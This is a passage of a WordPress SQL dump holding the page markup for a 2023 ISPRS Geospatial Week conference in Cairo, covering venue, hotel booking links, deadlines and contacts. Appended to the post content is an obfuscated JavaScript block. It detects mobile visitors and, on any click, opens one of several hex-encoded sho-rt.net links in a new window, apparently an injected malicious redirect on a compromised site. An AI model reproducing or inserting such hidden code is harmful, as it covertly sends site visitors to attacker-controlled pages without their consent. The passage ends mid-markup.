!important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-14 10:46:47','2023-06-14 10:46:47','',3066,'https://gsw2023.com/?p=4696',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4697,1,'2023-06-14 10:47:40','2023-06-14 10:47:40','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner 